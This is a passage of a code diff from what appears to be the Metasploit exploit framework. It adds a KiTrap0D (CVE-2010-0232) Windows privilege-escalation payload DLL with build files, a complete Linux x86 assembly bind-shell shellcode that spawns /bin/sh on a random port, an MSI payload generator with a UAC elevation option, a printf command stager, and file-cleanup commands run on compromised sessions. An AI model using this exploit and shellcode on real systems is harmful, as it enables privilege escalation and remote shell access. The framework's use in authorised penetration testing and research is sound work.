+      <BasicRuntimeChecks>EnableFastChecks</BasicRuntimeChecks>
+      <RuntimeLibrary>MultiThreadedDebug</RuntimeLibrary>
+      <PrecompiledHeader>
+      </PrecompiledHeader>
+      <WarningLevel>Level3</WarningLevel>
+    </ClCompile>
+    <Link>
+      <AdditionalDependencies>Mpr.lib;%(AdditionalDependencies)</AdditionalDependencies>
+      <AdditionalLibraryDirectories>%(AdditionalLibraryDirectories)</AdditionalLibraryDirectories>
+      <DelayLoadDLLs>%(DelayLoadDLLs)</DelayLoadDLLs>
+      <GenerateDebugInformation>true</GenerateDebugInformation>
+      <SubSystem>Windows</SubSystem>
+      <TargetMachine>MachineX86</TargetMachine>
+    </Link>
+    <PostBuildEvent>
+      <Command>editbin.exe /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" &gt; NUL</Command>
+    </PostBuildEvent>
+  </ItemDefinitionGroup>
+  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
+    <ClCompile>
+      <Optimization>MinSpace</Optimization>
+      <InlineFunctionExpansion>OnlyExplicitInline</InlineFunctionExpansion>
+      <IntrinsicFunctions>false</IntrinsicFunctions>
+      <AdditionalIncludeDirectories>%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
+      <PreprocessorDefinitions>WIN32;NDEBUG;_WINDOWS;_USRDLL;KITRAP0D_PAYLOAD_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+      <StringPooling>true</StringPooling>
+      <RuntimeLibrary>MultiThreaded</RuntimeLibrary>
+      <FunctionLevelLinking>false</FunctionLevelLinking>
+      <PrecompiledHeader>
+      </PrecompiledHeader>
+      <AssemblerListingLocation>$(OutDir)\</AssemblerListingLocation>
+      <ObjectFileName>$(OutDir)\</ObjectFileName>
+      <ProgramDataBaseFileName>$(OutDir)\</ProgramDataBaseFileName>
+      <WarningLevel>Level3</WarningLevel>
+      <DebugInformationFormat>ProgramDatabase</DebugInformationFormat>
+      <BufferSecurityCheck>false</BufferSecurityCheck>
+      <FavorSizeOrSpeed>Size</FavorSizeOrSpeed>
+    </ClCompile>
+    <Link>
+      <AdditionalDependencies>Mpr.lib;%(AdditionalDependencies)</AdditionalDependencies>
+      <AdditionalLibraryDirectories>%(AdditionalLibraryDirectories)</AdditionalLibraryDirectories>
+      <IgnoreAllDefaultLibraries>false</IgnoreAllDefaultLibraries>
+      <IgnoreSpecificDefaultLibraries>%(IgnoreSpecificDefaultLibraries)</IgnoreSpecificDefaultLibraries>
+      <DelayLoadDLLs>%(DelayLoadDLLs)</DelayLoadDLLs>
+      <GenerateDebugInformation>false</GenerateDebugInformation>
+      <GenerateMapFile>true</GenerateMapFile>
+      <MapFileName>$(OutDir)\kitrap0d_payload.map</MapFileName>
+      <SubSystem>Windows</SubSystem>
+      <OptimizeReferences>
+      </OptimizeReferences>
+      <EnableCOMDATFolding>
+      </EnableCOMDATFolding>
+      <RandomizedBaseAddress>false</RandomizedBaseAddress>
+      <DataExecutionPrevention>
+      </DataExecutionPrevention>
+      <ImportLibrary>$(OutDir)\kitrap0d_payload.lib</ImportLibrary>
+      <TargetMachine>MachineX86</TargetMachine>
+      <Profile>false</Profile>
+    </Link>
+    <PostBuildEvent>
+      <Command>editbin.exe /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,4.0 "$(TargetDir)$(TargetFileName)" &gt; NUL</Command>
+    </PostBuildEvent>
+  </ItemDefinitionGroup>
+  <ItemGroup>
+    <ClCompile Include="kitrap0d.c" />
+    <ClCompile Include="main.c" />
+  </ItemGroup>
+  <ItemGroup>
+    <ClInclude Include="..\common\common.h" />
+    <ClInclude Include="kitrap0d.h" />
+  </ItemGroup>
+  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
+  <ImportGroup Label="ExtensionTargets">
+    <Import Project="$(VCTargetsPath)\BuildCustomizations\masm.targets" />
+  </ImportGroup>
+</Project>

external/source/exploits/CVE-2010-0232/kitrap0d_payload/kitrap0d_payload.vcxproj.filters

@@ -0,0 +1,18 @@
+<?xml version="1.0" encoding="utf-8"?>
+<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
+  <ItemGroup>
+    <ClCompile Include="kitrap0d.c" />
+    <ClCompile Include="main.c" />
+  </ItemGroup>
+  <ItemGroup>
+    <ClInclude Include="kitrap0d.h" />
+    <ClInclude Include="..\common\common.h">
+      <Filter>common</Filter>
+    </ClInclude>
+  </ItemGroup>
+  <ItemGroup>
+    <Filter Include="common">
+      <UniqueIdentifier>{e7b668e3-c161-49b7-a15a-94b7d6777d01}</UniqueIdentifier>
+    </Filter>
+  </ItemGroup>
+</Project>

external/source/exploits/CVE-2010-0232/kitrap0d_payload/main.c

@@ -0,0 +1,156 @@
+//
+// Note: To use the produced x86 dll on NT4 we use a post build event "editbin.exe /OSVERSION:4.0 /SUBSYSTEM:WINDOWS,4.0 elevator.dll" 
+//       in order to change the MajorOperatingSystemVersion and MajorSubsystemVersion to 4 instead of 5 as Visual C++ 2008
+//       can't build PE images for NT4 (only 2000 and up). The modified dll will then work on NT4 and up. This does
+//       not apply to the produced x64 dll.
+//
+
+#define REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR
+#define REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN
+#include "../common/ReflectiveLoader.c"
+
+#include <stdlib.h>
+#include "kitrap0d.h"
+#include "../common/common.h"
+
+/*!
+ * @brief Grab a \c DWORD value out of the command line.
+ * @example elevator_command_dword( "/FOO:0x41414141 /BAR:0xCAFEF00D", "/FOO:" ) == 0x41414141
+ * @param cpCommandLine Command line string
+ * @param cpCommand The command to look for to get the associated \c int from.
+ * @returns The \c int value associated with the \c cpCommand.
+ */
+DWORD elevator_command_dword(char * cpCommandLine, char * cpCommand)
+{
+	char * cpString = NULL;
+	DWORD dwResult = 0;
+
+	do
+	{
+		if (!cpCommandLine || !cpCommand) {
+			break;
+		}
+
+		cpString = strstr(cpCommandLine, cpCommand);
+		if (!cpString) {
+			break;
+		}
+
+		cpString += strlen(cpCommand);
+
+		dwResult = strtoul(cpString, NULL, 0);
+
+	} while (0);
+
+	return dwResult;
+}
+
+/*!
+ * @brief Grab an \c int value out of the command line.
+ * @example elevator_command_dword( "/FOO:12345 /BAR:54321", "/FOO:" ) == 12345
+ * @param cpCommandLine Command line string
+ * @param cpCommand The command to look for to get the associated \c int from.
+ * @returns The \c int value associated with the \c cpCommand.
+ */
+int elevator_command_int(char * cpCommandLine, char * cpCommand)
+{
+	char * cpString = NULL;
+	int iResult = 0;
+
+	do
+	{
+		if (!cpCommandLine || !cpCommand) {
+			break;
+		}
+
+		cpString = strstr(cpCommandLine, cpCommand);
+		if (!cpString) {
+			break;
+		}
+
+		cpString += strlen(cpCommand);
+
+		iResult = atoi(cpString);
+
+	} while (0);
+
+	return iResult;
+}
+
+/*!
+ * @brief The real entrypoint for this app.
+ * @param cpCommandLine Pointer to the command line.
+ */
+VOID elevator_main(char * cpCommandLine)
+{
+	DWORD dwResult = ERROR_SUCCESS;
+
+	do
+	{
+		dprintf("[KITRAP0D] elevator_main. cpCommandLine=0x%08X", (DWORD)cpCommandLine);
+
+		if (!cpCommandLine) {
+			break;
+		}
+
+		if (strlen(cpCommandLine) == 0) {
+			break;
+		}
+
+		dprintf("[KITRAP0D] elevator_main. lpCmdLine=%s", cpCommandLine);
+
+		DWORD dwProcessId = 0;
+		DWORD dwKernelBase = 0;
+		DWORD dwOffset = 0;
+
+		dwProcessId = elevator_command_dword(cpCommandLine, "/VDM_TARGET_PID:");
+		dwKernelBase = elevator_command_dword(cpCommandLine, "/VDM_TARGET_KRN:");
+		dwOffset = elevator_command_dword(cpCommandLine, "/VDM_TARGET_OFF:");
+
+		if (!dwProcessId || !dwKernelBase) {
+			break;
+		}
+
+		dprintf("[KITRAP0D] Invoking exploit");
+		elevator_kitrap0d(dwProcessId, dwKernelBase, dwOffset);
+
+		// ...we should never return here...
+		dprintf("[KITRAP0D] This shouldn't happen");
+	} while (0);
+}
+
+/*!
+ * @brief rundll32.exe entry point.
+ * @todo Remove this?
+ */
+VOID DLLEXPORT CALLBACK a(HWND hWnd, HINSTANCE hInstance, LPSTR lpszCmdLine, int nCmdShow)
+{
+	elevator_main(lpszCmdLine);
+
+	ExitProcess(ERROR_SUCCESS);
+}
+
+/*!
+ * @brief DLL entry point.
+ * @remark If we have been injected via RDI, lpReserved will be our command line.
+ */
+BOOL WINAPI DllMain(HINSTANCE hInstance, DWORD dwReason, LPVOID lpReserved)
+{
+	BOOL bReturnValue = TRUE;
+
+	switch (dwReason)
+	{
+	case DLL_PROCESS_ATTACH:
+		hAppInstance = hInstance;
+		if (lpReserved != NULL) {
+			elevator_main((char *)lpReserved);
+		}
+		break;
+	case DLL_PROCESS_DETACH:
+	case DLL_THREAD_ATTACH:
+	case DLL_THREAD_DETACH:
+		break;
+	}
+
+	return bReturnValue;
+}

external/source/shellcode/linux/ia32/Makefile

@@ -4,7 +4,8 @@ STAGERS=stager_sock_bind stager_sock_bind6 stager_sock_bind_udp stager_sock_bind
 				stager_sock_reverse_udp_dns
 STAGES=stage_tcp_shell stage_udp_shell
 SINGLE=single_adduser single_bind_tcp_shell single_find_tcp_shell \
-       single_reverse_tcp_shell single_reverse_udp_shell single_exec
+			 single_reverse_tcp_shell single_reverse_udp_shell single_exec \
+			 single_shell_bind_tcp_random_port
 
 OBJS=${STAGERS} ${STAGES} ${SINGLE}
 

external/source/shellcode/linux/ia32/single_shell_bind_tcp_random_port.asm

@@ -0,0 +1,117 @@
+;;
+;
+; Name: single_shell_bind_tcp_random
+; Qualities: None
+; Platforms: Linux
+; Author: Geyslan G. Bem <geyslan@gmail.com>
+; License: BSD 3-Clause
+;
+; This file is part of the Metasploit Exploit Framework
+; and is subject to the same licenses and copyrights as
+; the rest of this package.
+;
+; Description:
+;
+;  Listen for a connection in a random port and spawn a
+;  command shell.
+;  Use nmap to discover the open port: 'nmap -sS target -p-'.
+;  Repo source: http://goo.gl/V5OObo
+;
+;;
+
+bits 32
+
+global _start
+
+section .text
+
+_start:
+	; Avoiding garbage
+	; Putting zero in three registers (eax, ebx and edx), search about mul instruction for understanding
+
+	xor ebx, ebx
+	mul ebx
+
+	; syscalls (/usr/include/asm/unistd_32.h)
+	; socketcall numbers (/usr/include/linux/net.h)
+
+	; Creating the socket file descriptor
+	; int socket(int domain, int type, int protocol);
+	; socket(AF_INET, SOCK_STREAM, IPPROTO_IP)
+
+	mov al, 102		; syscall 102 - socketcall
+	inc ebx			; socketcall type (sys_socket 1)
+
+	; socket arguments (bits/socket.h, netinet/in.h)
+	push edx		; IPPROTO_IP = 0 (int)
+	push ebx		; SOCK_STREAM = 1 (int)
+	push 2			; AF_INET = 2 (int)
+
+	mov ecx, esp		; ptr to argument array
+
+	int 0x80		; kernel interruption
+
+
+	; Preparing to listen the incoming connection (passive socket)
+	; int listen(int sockfd, int backlog);
+	; listen(sockfd, int);
+
+	; listen arguments
+	push edx		; put zero
+	push eax		; put the file descriptor returned by socket()
+	mov ecx, esp		; ptr to argument array
+
+	mov al, 102		; syscall 102 - socketcall
+	mov bl, 4		; socketcall type (sys_listen 4)
+
+	int 0x80		; kernel interruption
+
+
+	; Accepting the incoming connection
+	; int accept(int sockfd, struct sockaddr *addr, socklen_t *addrlen);
+	; accept(sockfd, NULL, NULL)
+
+        mov al, 102		; syscall 102 - socketcall
+        inc ebx			; socketcall type (sys_accept 5)
+
+	; accept arguments	; here we just don't need do nothing, the ecx already points to sockfd, NULL and 2
+				; you ask me: but the correct isn't sockfd, NULL, NULL? Well, 'man accept' to figure out ;D)
+
+	int 0x80		; kernel interruption
+
+
+	; Creating a interchangeably copy of the 3 file descriptors (stdin, stdout, stderr)
+	; int dup2(int oldfd, int newfd);
+	; dup2(clientfd, ...)
+
+	pop ecx			; pop the sockfd integer to use as the loop counter ecx
+	xchg ebx, eax		; swapping registers values to put the accepted sockfd (client) in ebx as argument in next syscall (dup2)
+
+dup_loop:
+	push 63			; syscall 63 - dup2
+	pop eax
+
+	int 0x80		; kernel interruption
+
+	dec ecx			; file descriptor and loop counter
+
+	jns dup_loop
+
+
+	; Finally, using execve to substitute the actual process with /bin/sh
+	; int execve(const char *filename, char *const argv[], char *const envp[]);
+	; exevcve("/bin/sh", NULL, NULL)
+
+	mov al, 11		; execve syscall
+
+	; execve string argument
+	; stack already contains NULL on top
+	push 0x68732f2f		; "//sh"
+	push 0x6e69622f		; "/bin"
+
+	mov ebx, esp		; ptr to "/bin//sh" string
+
+	inc ecx			; zero to argv
+				; zero to envp (edx)
+
+	int 0x80

lib/msf/core.rb

@@ -57,6 +57,9 @@ require 'msf/core/nop'
 require 'msf/core/payload'
 require 'msf/core/post'
 
+# Custom HTTP Modules
+require 'msf/http/wordpress'
+require 'msf/http/typo3'
 
 # Drivers
 require 'msf/core/exploit_driver'

lib/msf/core/auxiliary/jtr.rb

@@ -32,18 +32,24 @@ module Auxiliary::JohnTheRipper
     )
 
     @run_path  = nil
-    @john_path = ::File.join(Msf::Config.install_root, "data", "john")
+    @john_path = ::File.join(Msf::Config.data_directory, "john")
 
     autodetect_platform
   end
 
+  # @return [String] the run path instance variable if the platform is detectable, nil otherwise.
   def autodetect_platform
-    cpuinfo_base = ::File.join(Msf::Config.install_root, "data", "cpuinfo")
     return @run_path if @run_path
+    cpuinfo_base = ::File.join(Msf::Config.data_directory, "cpuinfo")
+    if File.directory?(cpuinfo_base)
+      data = nil
 
       case ::RUBY_PLATFORM
       when /mingw|cygwin|mswin/
-      data = `"#{cpuinfo_base}/cpuinfo.exe"` rescue nil
+        fname = "#{cpuinfo_base}/cpuinfo.exe"
+        if File.exists?(fname) and File.executable?(fname)
+          data = %x{"#{fname}"} rescue nil
+        end
         case data
         when /sse2/
           @run_path ||= "run.win32.sse2/john.exe"
@@ -52,20 +58,24 @@ module Auxiliary::JohnTheRipper
         else
           @run_path ||= "run.win32.any/john.exe"
         end
-
       when /x86_64-linux/
-      ::FileUtils.chmod(0755, "#{cpuinfo_base}/cpuinfo.ia64.bin") rescue nil
+        fname = "#{cpuinfo_base}/cpuinfo.ia64.bin"
-      data = `#{cpuinfo_base}/cpuinfo.ia64.bin` rescue nil
+        if File.exists? fname
+          ::FileUtils.chmod(0755, fname) rescue nil
+          data = %x{"#{fname}"} rescue nil
+        end
         case data
         when /mmx/
           @run_path ||= "run.linux.x64.mmx/john"
         else
           @run_path ||= "run.linux.x86.any/john"
         end
-
       when /i[\d]86-linux/
-      ::FileUtils.chmod(0755, "#{cpuinfo_base}/cpuinfo.ia32.bin") rescue nil
+        fname = "#{cpuinfo_base}/cpuinfo.ia32.bin"
-      data = `#{cpuinfo_base}/cpuinfo.ia32.bin` rescue nil
+        if File.exists? fname
+          ::FileUtils.chmod(0755, fname) rescue nil
+          data = %x{"#{fname}"} rescue nil
+        end
         case data
         when /sse2/
           @run_path ||= "run.linux.x86.sse2/john"
@@ -75,7 +85,9 @@ module Auxiliary::JohnTheRipper
           @run_path ||= "run.linux.x86.any/john"
         end
       end
-    @run_path
+    end
+
+    return @run_path
   end
 
   def john_session_id

lib/msf/core/auxiliary/mime_types.rb

@@ -23,7 +23,7 @@ module Auxiliary::MimeTypes
   end
 
   def mime_load_extension_map
-    path = File.join( Msf::Config.install_root, "data", "mime.yml")
+    path = File.join( Msf::Config.data_directory, "mime.yml")
     @extension_map = YAML.load_file(path)
   end
 

lib/msf/core/constants.rb

@@ -80,6 +80,7 @@ module OperatingSystems
     VISTA = "Vista"
     TWOK8 = "2008"
     SEVEN = "7"
+    EIGHT = "8"
   end
 
   UNKNOWN = "Unknown"

lib/msf/core/db.rb

@@ -41,6 +41,7 @@ require 'rex/parser/nexpose_simple_nokogiri'
 require 'rex/parser/nmap_nokogiri'
 require 'rex/parser/openvas_nokogiri'
 require 'rex/parser/wapiti_nokogiri'
+require 'rex/parser/outpost24_nokogiri'
 
 # Legacy XML parsers -- these will be converted some day
 require 'rex/parser/ip360_aspl_xml'
@@ -2926,7 +2927,7 @@ class DBManager
   # Returns one of: :nexpose_simplexml :nexpose_rawxml :nmap_xml :openvas_xml
   # :nessus_xml :nessus_xml_v2 :qualys_scan_xml, :qualys_asset_xml, :msf_xml :nessus_nbe :amap_mlog
   # :amap_log :ip_list, :msf_zip, :libpcap, :foundstone_xml, :acunetix_xml, :appscan_xml
-  # :burp_session, :ip360_xml_v3, :ip360_aspl_xml, :nikto_xml
+  # :burp_session, :ip360_xml_v3, :ip360_aspl_xml, :nikto_xml, :outpost24_xml
   # If there is no match, an error is raised instead.
   def import_filetype_detect(data)
 
@@ -3059,6 +3060,9 @@ class DBManager
             @import_filedata[:type] = "CI"
             return :ci_xml
           end
+        when "main"
+          @import_filedata[:type] = "Outpost24 XML"
+          return :outpost24_xml
         else
           # Give up if we haven't hit the root tag in the first few lines
           break if line_count > 10
@@ -3649,7 +3653,7 @@ class DBManager
     data = ::File.open(args[:filename], "rb") {|f| f.read(f.stat.size)}
     wspace = args[:wspace] || args['wspace'] || workspace
     bl = validate_ips(args[:blacklist]) ? args[:blacklist].split : []
-    basedir = args[:basedir] || args['basedir'] || ::File.join(Msf::Config.install_root, "data", "msf")
+    basedir = args[:basedir] || args['basedir'] || ::File.join(Msf::Config.data_directory, "msf")
 
     allow_yaml = false
     btag = nil
@@ -5923,6 +5927,36 @@ class DBManager
     parser.parse(args[:data])
   end
 
+  def import_outpost24_xml(args={}, &block)
+    bl = validate_ips(args[:blacklist]) ? args[:blacklist].split : []
+    wspace = args[:wspace] || workspace
+    if Rex::Parser.nokogiri_loaded
+      parser = "Nokogiri v#{::Nokogiri::VERSION}"
+      noko_args = args.dup
+      noko_args[:blacklist] = bl
+      noko_args[:wspace] = wspace
+      if block
+        yield(:parser, parser)
+        import_outpost24_noko_stream(noko_args) {|type, data| yield type,data}
+      else
+        import_outpost24_noko_stream(noko_args)
+      end
+      return true
+    else # Sorry
+      raise DBImportError.new("Could not import due to missing Nokogiri parser. Try 'gem install nokogiri'.")
+    end
+  end
+
+  def import_outpost24_noko_stream(args={},&block)
+    if block
+      doc = Rex::Parser::Outpost24Document.new(args,framework.db) {|type, data| yield type,data }
+    else
+      doc = Rex::Parser::Outpost24Document.new(args,self)
+    end
+    parser = ::Nokogiri::XML::SAX::Parser.new(doc)
+    parser.parse(args[:data])
+  end
+
 
   def unserialize_object(xml_elem, allow_yaml = false)
     return nil unless xml_elem

lib/msf/core/exploit/cmdstager_debug_asm.rb

@@ -19,7 +19,7 @@ module Exploit::CmdStagerDebugAsm
     register_advanced_options(
       [
         OptString.new( 'DECODERSTUB',  [ true, 'The debug.exe assembly listing decoder stub to use.',
-          File.join(Msf::Config.install_root, "data", "exploits", "cmdstager", "debug_asm")]),
+          File.join(Msf::Config.data_directory, "exploits", "cmdstager", "debug_asm")]),
       ], self.class)
   end
 

lib/msf/core/exploit/cmdstager_debug_write.rb

@@ -19,7 +19,7 @@ module Exploit::CmdStagerDebugWrite
     register_advanced_options(
       [
         OptString.new( 'DECODERSTUB',  [ true, 'The debug.exe file-writing decoder stub to use.',
-          File.join(Msf::Config.install_root, "data", "exploits", "cmdstager", "debug_write")]),
+          File.join(Msf::Config.data_directory, "exploits", "cmdstager", "debug_write")]),
       ], self.class)
   end
 

lib/msf/core/exploit/cmdstager_printf.rb

@@ -0,0 +1,27 @@
+# -*- coding: binary -*-
+
+require 'msf/core/exploit/cmdstager'
+
+module Msf
+
+####
+# Allows for staging cmd to arbitrary payloads through the CmdStagerPrintf.
+#
+# This stager uses a POSIX-conformant printf, that supports the interpretation
+# of octal escapes, to drop an ELF with the payload embedded to disk.
+####
+
+module Exploit::CmdStagerPrintf
+
+  include Msf::Exploit::CmdStager
+
+  # Initializes a CmdStagerPrintf instance for the supplied payload
+  #
+  # @param exe [String] The payload embedded into an ELF
+  # @return [Rex::Exploitation::CmdStagerPrintf] Stager instance
+  def create_stager(exe)
+    Rex::Exploitation::CmdStagerPrintf.new(exe)
+  end
+end
+
+end

lib/msf/core/exploit/cmdstager_vbs.rb

@@ -19,7 +19,7 @@ module Exploit::CmdStagerVBS
     register_advanced_options(
       [
         OptString.new( 'DECODERSTUB',  [ true, 'The VBS base64 file decoder stub to use.',
-          File.join(Msf::Config.install_root, "data", "exploits", "cmdstager", "vbs_b64")]),
+          File.join(Msf::Config.data_directory, "exploits", "cmdstager", "vbs_b64")]),
       ], self.class)
   end
 

lib/msf/core/exploit/cmdstager_vbs_adodb.rb

@@ -19,7 +19,7 @@ module Exploit::CmdStagerVBS::ADODB
     register_advanced_options(
       [
         OptString.new( 'DECODERSTUB',  [ true, 'The VBS base64 file decoder stub to use.',
-          File.join(Msf::Config.install_root, "data", "exploits", "cmdstager", "vbs_b64_adodb")]),
+          File.join(Msf::Config.data_directory, "exploits", "cmdstager", "vbs_b64_adodb")]),
       ], self.class)
   end
 

lib/msf/core/exploit/exe.rb

@@ -20,15 +20,20 @@ module Exploit::EXE
         OptPath.new(   'EXE::Path',     [ false, 'The directory in which to look for the executable template' ]),
         OptPath.new(   'EXE::Template', [ false, 'The executable template file name.' ]),
         OptBool.new(   'EXE::Inject',   [ false, 'Set to preserve the original EXE function' ]),
-        OptBool.new(   'EXE::OldMethod', [ false, 'Set to use the substitution EXE generation method.' ]),
+        OptBool.new(   'EXE::OldMethod',[ false, 'Set to use the substitution EXE generation method.' ]),
-        OptBool.new(   'EXE::FallBack', [ false, 'Use the default template in case the specified one is missing' ])
+        OptBool.new(   'EXE::FallBack', [ false, 'Use the default template in case the specified one is missing' ]),
+        OptPath.new(   'MSI::Custom',   [ false, 'Use custom msi instead of automatically generating a payload msi']),
+        OptPath.new(   'MSI::Path',     [ false, 'The directory in which to look for the msi template' ]),
+        OptPath.new(   'MSI::Template', [ false, 'The msi template file name' ]),
+        OptBool.new(   'MSI::UAC',      [ false, 'Create an MSI with a UAC prompt (elevation to SYSTEM if accepted)' ])
       ], self.class)
   end
 
-  def get_custom_exe
+  def get_custom_exe(path=nil)
-    print_status("Using custom executable #{datastore["EXE::Custom"]}, RHOST and RPORT settings will be ignored!")
+    path ||= datastore['EXE::Custom']
+    print_status("Using custom payload #{path}, RHOST and RPORT settings will be ignored!")
     datastore['DisablePayloadHandler'] = true
-    file = ::File.open(datastore['EXE::Custom'],'rb')
+    file = ::File.open(path,'rb')
     exe = file.read(file.stat.size)
     file.close
     exe
@@ -99,6 +104,22 @@ module Exploit::EXE
     dll
   end
 
+  def generate_payload_msi(opts = {})
+    return get_custom_exe(datastore['MSI::Custom']) if datastore.include? 'MSI::Custom'
+
+    exe = generate_payload_exe(opts)
+
+    opts.merge! ({
+        :msi_template => datastore['MSI::Template'],
+        :msi_template_path => datastore['MSI::Path'],
+        :uac => datastore['MSI::UAC']
+    })
+
+    msi = Msf::Util::EXE.to_exe_msi(framework, exe, opts)
+
+    return msi
+  end
+
 protected
   def exe_init_options(opts)
     opts.merge!(

lib/msf/core/exploit/file_dropper.rb

@@ -47,19 +47,18 @@ module Exploit::FileDropper
           false
         end
       else
-        cmds = [
+        win_cmds = [
             %Q|attrib.exe -r "#{win_file}"|,
-            %Q|del.exe /f /q "#{win_file}"|,
+            %Q|del.exe /f /q "#{win_file}"|
-            %Q|rm -f "#{file}" >/dev/null|,
         ]
-
         # We need to be platform-independent here. Since we can't be
         # certain that {#target} is accurate because exploits with
         # automatic targets frequently change it, we just go ahead and
         # run both a windows and a unixy command in the same line. One
         # of them will definitely fail and the other will probably
         # succeed. Doing it this way saves us an extra round-trip.
-        session.shell_command_token(cmds.join(" ; "))
+        # Trick shared by @mihi42
+        session.shell_command_token("rm -f \"#{file}\" >/dev/null ; echo ' & #{win_cmds.join(" & ")} & echo \" ' >/dev/null")
         print_good("Deleted #{file}")
         true
       end